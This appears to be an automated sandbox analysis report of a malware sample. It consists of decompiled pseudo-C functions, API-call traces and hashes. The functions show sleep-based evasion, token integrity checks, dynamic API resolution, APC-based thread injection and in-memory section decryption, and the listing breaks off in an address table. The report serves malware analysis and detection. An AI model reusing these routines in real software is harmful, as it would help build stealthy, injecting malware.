MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 001D8273
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,001D5C91,?,?), ref: 001D8294
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D5C91,?,?,4D283A53), ref: 001D829C

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: ad53f9bfd7cecc62724fcd24ee68699bf61b3564b6adc242bcf76bf48197313d
Instruction ID: 63ffb136cf15f8d309f6410def5a5d78ebb58b17e96199aa9e8f56fd78cd19ef
Opcode Fuzzy Hash: ad53f9bfd7cecc62724fcd24ee68699bf61b3564b6adc242bcf76bf48197313d
Instruction Fuzzy Hash: 3421DF76642605FFD711ABA4DC05F9E77A9AF48740F254123F60AEB2D0DB70DA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D523A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E001D523A(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x1dd238 = _t10;
				if(_t10 != 0) {
					 *0x1dd1a8 = GetTickCount();
					_t12 = E001D14CE(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L001DB1D6();
							_t33 = _t14 + _t16;
							_t18 = E001D80C5(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E001D52E5(_t25) != 0) {
							 *0x1dd260 = 1; // executed
						}
						_t12 = E001D5C02(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x001d523a
0x001d5240
0x001d5241
0x001d524d
0x001d5253
0x001d525a
0x001d526a
0x001d526f
0x001d5276
0x001d5278
0x001d527d
0x001d5283
0x001d5289
0x001d5293
0x001d5297
0x001d5299
0x001d529e
0x001d529f
0x001d52a0
0x001d52a5
0x001d52ab
0x001d52b4
0x001d52b5
0x001d52ba
0x001d52c0
0x001d52cc
0x001d52ce
0x001d52ce
0x001d52d8
0x001d52d8
0x001d525c
0x001d525e
0x001d525e
0x001d52e2

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,001D647E,?), ref: 001D524D
GetTickCount.KERNEL32 ref: 001D5261
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,001D647E,?), ref: 001D527D
SwitchToThread.KERNEL32(?,00000001,?,?,?,001D647E,?), ref: 001D5283
_aullrem.NTDLL(?,?,00000009,00000000), ref: 001D52A0
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,001D647E,?), ref: 001D52BA

Strings

BX, xrefs: 001D526A

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID: BX
API String ID: 507476733-1137598685
Opcode ID: 411c30145653b58c146815dcdd726034d2411430b43812e5fb892144e169e285
Instruction ID: 53ef1665db25b0a93be3761e453749a86e9d319184467c1f57cb9a6d1e8373e4
Opcode Fuzzy Hash: 411c30145653b58c146815dcdd726034d2411430b43812e5fb892144e169e285
Instruction Fuzzy Hash: 3D114872642701FFE710AB78EC4EB1A7BDAEB44350F104617F904D6790EB70D880C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 001D54DA, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D54DA(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x1dd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E001D7E20(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E001DA5FA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x001d54e7
0x001d54ee
0x001d54f5
0x001d5509
0x001d5514
0x001d552c
0x001d5539
0x001d553c
0x001d5541
0x001d554c
0x001d5550
0x001d555f
0x001d5563
0x001d557f
0x001d557f
0x001d5583
0x001d5583
0x001d5588
0x001d558c
0x001d5592
0x001d5593
0x001d559a
0x001d55a0

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 001D550C
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 001D552C
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 001D553C
CloseHandle.KERNEL32(00000000), ref: 001D558C

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 001D555F
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 001D5567
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 001D5577

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 64db854af08ee23d68befe2b6ecf267f8a6a118ffb2ed77abc366b1dc3c5ab59
Instruction ID: a30da5cf1cd7f78abf79f1a00513e88acf92813a410fdb30c81b574402114ee4
Opcode Fuzzy Hash: 64db854af08ee23d68befe2b6ecf267f8a6a118ffb2ed77abc366b1dc3c5ab59
Instruction Fuzzy Hash: 89213C75901209FFEB019F94EC44EAEBF7AEB49304F1040A6F511A62A1C7759F45DF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E24150D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E24150D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E241CC8(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e244144 + 0x6e245014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e244144 + 0x6e245151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E24133D(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e244144 + 0x6e245161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e244144 + 0x6e245174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e244144 + 0x6e245189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e244144 + 0x6e24519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E2415F1(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6e24151b
0x6e24151f
0x6e2415e0
0x6e241525
0x6e24153d
0x6e24154c
0x6e241553
0x6e241555
0x6e24155a
0x6e2415d8
0x6e2415d9
0x6e24155c
0x6e241569
0x6e24156b
0x6e241570
0x00000000
0x6e241572
0x6e24157f
0x6e241581
0x6e241586
0x00000000
0x6e241588
0x6e241595
0x6e241597
0x6e24159c
0x00000000
0x6e24159e
0x6e2415ab
0x6e2415ad
0x6e2415b2
0x00000000
0x6e2415b4
0x6e2415ba
0x6e2415c0
0x6e2415c5
0x6e2415ca
0x6e2415cf
0x00000000
0x6e2415d1
0x6e2415d4
0x6e2415d4
0x6e2415cf
0x6e2415b2
0x6e24159c
0x6e241586
0x6e241570
0x6e24155a
0x6e2415ee

APIs

Part of subcall function 6E241CC8: HeapAlloc.KERNEL32(00000000,?,6E241C03,00000208,00000000,00000000,?,?,?,6E2412A1,?), ref: 6E241CD4

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E2416D5,?,?,?,?,?,00000002,?,6E2414D0), ref: 6E241531
GetProcAddress.KERNEL32(00000000,?), ref: 6E241553
GetProcAddress.KERNEL32(00000000,?), ref: 6E241569
GetProcAddress.KERNEL32(00000000,?), ref: 6E24157F
GetProcAddress.KERNEL32(00000000,?), ref: 6E241595
GetProcAddress.KERNEL32(00000000,?), ref: 6E2415AB

Part of subcall function 6E2415F1: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E24164E
Part of subcall function 6E2415F1: memset.NTDLL ref: 6E241670

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 9436fa4e8dabd206aadc2e191992ba18ab2c8e4e236d2428be7e28075f128b0f
Instruction ID: 1ff7bbadb467c14e44a410de93fa422223c4eef407518c84f34657e0c4af95fc
Opcode Fuzzy Hash: 9436fa4e8dabd206aadc2e191992ba18ab2c8e4e236d2428be7e28075f128b0f
Instruction Fuzzy Hash: D62181B0640B0FEFDB11EFAAC984E9A77EEEF463057404525E45AE7210EB70E905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E241F56, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e244108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e24410c;
						if( *0x6e24410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e244118;
								if( *0x6e244118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e24410c);
						}
						HeapDestroy( *0x6e244110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e244108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6e244110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e244130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E24179C(E6E24173D, E6E241C6E(_a12, 1, 0x6e244118, _t41));
							 *0x6e24410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6e241f59
0x6e241f65
0x6e241f67
0x6e241f6a
0x6e241fe0
0x6e241fe6
0x6e241fe8
0x6e241fea
0x6e241ff0
0x6e241ff2
0x6e241ff7
0x6e241ffa
0x6e242005
0x6e242007
0x00000000
0x00000000
0x6e242009
0x6e24200c
0x6e24200e
0x00000000
0x00000000
0x00000000
0x6e24200e
0x6e242016
0x6e242016
0x6e242022
0x6e242022
0x6e241f6c
0x6e241f6d
0x6e241f8d
0x6e241f93
0x6e241f98
0x6e241f9a
0x6e241fd6
0x6e241fd6
0x6e241f9c
0x6e241fa4
0x6e241fab
0x6e241fb5
0x6e241fc1
0x6e241fc6
0x6e241fcd
0x6e241fd2
0x00000000
0x6e241fd2
0x6e241fcd
0x6e241f9a
0x6e241f6d
0x6e24202f

APIs

InterlockedIncrement.KERNEL32(6E244108), ref: 6E241F78
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E241F8D

Part of subcall function 6E24179C: CreateThread.KERNELBASE ref: 6E2417B3
Part of subcall function 6E24179C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E2417C8
Part of subcall function 6E24179C: GetLastError.KERNEL32(00000000), ref: 6E2417D3
Part of subcall function 6E24179C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E2417DD
Part of subcall function 6E24179C: CloseHandle.KERNEL32(00000000), ref: 6E2417E4
Part of subcall function 6E24179C: SetLastError.KERNEL32(00000000), ref: 6E2417ED

InterlockedDecrement.KERNEL32(6E244108), ref: 6E241FE0
SleepEx.KERNEL32(00000064,00000001), ref: 6E241FFA
CloseHandle.KERNEL32 ref: 6E242016
HeapDestroy.KERNEL32 ref: 6E242022

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: f273c9d175a32ce83aefda543ffab245717d361b152c7c2b53d708fe67cab86b
Instruction ID: af88337e12ca85e4b5931860626dad08a3b346cb5291a11e4049302c99a8086c
Opcode Fuzzy Hash: f273c9d175a32ce83aefda543ffab245717d361b152c7c2b53d708fe67cab86b
Instruction Fuzzy Hash: E721A4B6600A0AEFCB16AFE9CC8C9597BEBF766361B144525E519D7100D3B08945CF70

Uniqueness

Uniqueness Score: -1.00%

Function 6E24179C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E24179C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e244140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e2417b3
0x6e2417b9
0x6e2417bd
0x6e2417c8
0x6e2417d0
0x6e2417d9
0x6e2417dd
0x6e2417e4
0x6e2417eb
0x6e2417ed
0x6e2417f3
0x6e2417d0
0x6e2417f7

APIs

CreateThread.KERNELBASE ref: 6E2417B3
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E2417C8
GetLastError.KERNEL32(00000000), ref: 6E2417D3
TerminateThread.KERNEL32(00000000,00000000), ref: 6E2417DD
CloseHandle.KERNEL32(00000000), ref: 6E2417E4
SetLastError.KERNEL32(00000000), ref: 6E2417ED

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 6e9f8a6a52fe421aa4288af8f2d75780d2e6fe13b37a8fa03931f2ca1d996e33
Instruction ID: ec5675c612eb02f1dc6a1e1790609602018c364f96363ec6fa8d05c22c74c3de
Opcode Fuzzy Hash: 6e9f8a6a52fe421aa4288af8f2d75780d2e6fe13b37a8fa03931f2ca1d996e33
Instruction Fuzzy Hash: ADF0F832205E22FBDB23ABA1DC4CF9BBB6AFB0A752F005604F61691150C7A18915DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 001D5C02, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E001D5C02(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E001D3EDF();
				if(_t21 != 0) {
					_t59 =  *0x1dd25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x1dd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x1dd164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E001D87A2( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x1dd2a4; // 0x2dca5a8
					if( *0x1dd25c > 5) {
						_t8 = _t26 + 0x1de5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x1dea15; // 0x44283a44
						_t27 = _t7;
					}
					E001DA69B(_t27, _t27);
					_t31 = E001D81E7(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x1dd270 =  *0x1dd270 ^ 0x81bbe65d;
						_t32 = E001D7E20(0x60);
						 *0x1dd32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x1dd32c; // 0x2fa95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x1dd32c; // 0x2fa95b0
							 *_t51 = 0x1de836;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x1dd238, 0, 0x43);
							 *0x1dd2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x1dd25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x1dd2a4; // 0x2dca5a8
								_t13 = _t58 + 0x1de55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x1dc2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E001D2D6E( ~_v8 &  *0x1dd270,  &E001DD00C); // executed
								_t42 = E001D696A(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E001D418D(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E001D8494(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E001D620F(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x1dd160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E001D4359(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x001d5c02
0x001d5c0d
0x001d5c10
0x001d5c13
0x001d5c16
0x001d5c1d
0x001d5c1f
0x001d5c2b
0x001d5c2d
0x001d5c2d
0x001d5c36
0x001d5c3c
0x001d5c41
0x001d5c5b
0x001d5c67
0x001d5c69
0x001d5c6e
0x001d5c78
0x001d5c78
0x001d5c70
0x001d5c70
0x001d5c70
0x001d5c70
0x001d5c7f
0x001d5c8c
0x001d5c93
0x001d5c98
0x001d5c98
0x001d5ca0
0x001d5ca3
0x001d5cc9
0x001d5cd5
0x001d5cda
0x001d5cdf
0x001d5ce1
0x001d5d0d
0x001d5d0f
0x001d5ce3
0x001d5ce7
0x001d5cec
0x001d5cf1
0x001d5cf8
0x001d5cfe
0x001d5d03
0x001d5d09
0x001d5d10
0x001d5d12
0x001d5d14
0x001d5d23
0x001d5d29
0x001d5d2e
0x001d5d30
0x001d5d60
0x001d5d62
0x001d5d32
0x001d5d32
0x001d5d38
0x001d5d45
0x001d5d4b
0x001d5d4b
0x001d5d53
0x001d5d5c
0x001d5d63
0x001d5d65
0x001d5d67
0x001d5d6e
0x001d5d7b
0x001d5d80
0x001d5d85
0x001d5d87
0x001d5d89
0x00000000
0x00000000
0x001d5d8b
0x001d5d90
0x001d5d92
0x001d5d99
0x001d5d9d
0x001d5da0
0x001d5db5
0x001d5db9
0x001d5dbe
0x00000000
0x001d5dbe
0x001d5da2
0x001d5da4
0x00000000
0x00000000
0x001d5daa
0x001d5daf
0x001d5db1
0x001d5db3
0x00000000
0x00000000
0x00000000
0x001d5db3
0x001d5d96
0x001d5d96
0x001d5d67
0x001d5ca5
0x001d5ca5
0x001d5caa
0x001d5dc0
0x001d5dc4
0x001d5dcc
0x001d5dcc
0x00000000
0x001d5dc4
0x001d5cb0
0x001d5cb3
0x001d5cbd
0x001d5cc4
0x00000000
0x001d5dd4
0x001d5dd4
0x001d5dd8
0x001d5ddc
0x001d5ddc

APIs

Part of subcall function 001D3EDF: GetModuleHandleA.KERNEL32(4C44544E,00000000,001D5C1B,00000000,00000000), ref: 001D3EEE

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 001D5C98

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

memset.NTDLL ref: 001D5CE7
RtlInitializeCriticalSection.NTDLL(02FA9570), ref: 001D5CF8

Part of subcall function 001D620F: memset.NTDLL ref: 001D6224
Part of subcall function 001D620F: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 001D6258
Part of subcall function 001D620F: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 001D6263

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 001D5D23
wsprintfA.USER32 ref: 001D5D53

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: c2fed9e2ca82427a42734593b9bae4511e0fa492facad98176bfc1cfbf8a0cf6
Instruction ID: 8f2efb52af5189ab9a40d687ac31ffd7756dfb748c58b0074fbbcf518a0cfe31
Opcode Fuzzy Hash: c2fed9e2ca82427a42734593b9bae4511e0fa492facad98176bfc1cfbf8a0cf6
Instruction Fuzzy Hash: 9951D771A42F15ABDB21ABE4EC89B6E77BAAB18701F540817F101D7391E7709944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E2410E8, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E2410E8(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6e244130;
				_t50 = E6E241B4C(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6e244140;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6e2451a7; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6e244140 = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x6e2410ef
0x6e2410ff
0x6e241104
0x6e241109
0x6e24111e
0x6e241125
0x6e24112a
0x6e24113b
0x6e24113e
0x6e241144
0x6e241146
0x6e24114b
0x6e241227
0x6e241151
0x6e241151
0x6e241155
0x6e2411ed
0x6e24115b
0x6e24115c
0x6e241161
0x6e241164
0x6e241167
